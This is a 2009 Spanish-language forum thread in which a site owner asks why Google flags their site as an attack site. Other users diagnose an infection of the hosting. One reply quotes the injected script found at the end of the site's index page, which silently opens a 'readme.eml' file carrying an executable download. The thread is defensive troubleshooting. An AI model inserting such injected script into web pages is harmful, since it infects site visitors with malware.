Foros Programación Cliente
¡Este sitio es una web atacante!
7 7 Respuestas Miércoles 14 de octubre, 2009
me sale eso al entrar a la pagina, desde hoy, he pasado varios antivirus incluido el kaspersky online y esta todo correcto,pero google me cierra la pagina y pone un mensaje de virus en la portada, que hago?... gracias
la web es: www . kalipo . com
la web es: www . kalipo . com
-
yosoyraro
Registrado desde 27/12/08 / Número de posts: 103
Esto es lo que dice Google... y creo que deberías hablar con los proveedores del hosting.
lo raro sería no contar conmigo para tus proyectos....
¡Visita mi Nueva web! -
yosoyraro
Registrado desde 27/12/08 / Número de posts: 103
Por cierto, el antivirus me acaba de neutralizar un virus llamado W32-Nimda procedente de esa Web así que aconsejo que nadie entre a ver que error sale....
:)lo raro sería no contar conmigo para tus proyectos....
¡Visita mi Nueva web! -
dem
Registrado desde 28/04/03 / Número de posts: 2088
Esto me parece que ya le pasó a alguien... La historia era que se había metido un virus en el servidor donde tenía la web, con lo que esa web pasa a ser web atacante... Usando el buscador no encuentro nada, pero me suena que ya había un tema de ésto, prueba a ver... -
XCX
Registrado desde 04/05/09 / Número de posts: 27
A mi me ocurrió esto un par de veces, pégale un ojo al index y los javascripts que tengas subido en el servidor, es posible que te haya inyectado algún iframe en el código. -
dagi3d
Registrado desde 13/12/03 / Número de posts: 1054
parece que el jaleo está al final del index:
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
y el readme.eml es un mensaje de correo con un ejecutable adjunto que se intenta descargar a través de un iframe -
portishead
Registrado desde 15/07/04 / Número de posts: 270
A mi me pasó tb con una web, todavia no se porqué, pero me incrustaron "código malicioso" en el index. Lo borré , cambié todas las passwords y no me ha vuelto a pasar...de momento.
-
AxB
Registrado desde 10/05/06 / Número de posts: 514
ahi está metieron un codigo para potenciar el posicionamiento de otra web y google lo detecto como intrusion y nos prohibe el acceso temporal a la web, aquí publicaron el ataque para los que os haya afectado en Dreamhost, ya estoy migrando la pagina a otro server más seguro
ATAQUE MALWARE A DREAMHOST
gracias.
Áreas Domestika
- Diseño (gráfico, web, industrial, producto)
- Programación (cliente, servidor, accesibilidad)
- Ilustración (autores, inspiración, técnicas)
- Fotografía (técnica, equipo, autores)
- Motion Graphics (showreels, software, estudios)
- Publicidad (campañas, anuncios, ideas)
- Informática (software, hardware, trucos)
- 3D (técnicas, iluminación, modelado)
- Experiencia de Usuario (usabilidad, AI, HCI)
- Cine, vídeo y televisión (críticas, producción)
- Música y Audio (sonidos, loops, discos)
- Espacios (arquitectura, interiorismo)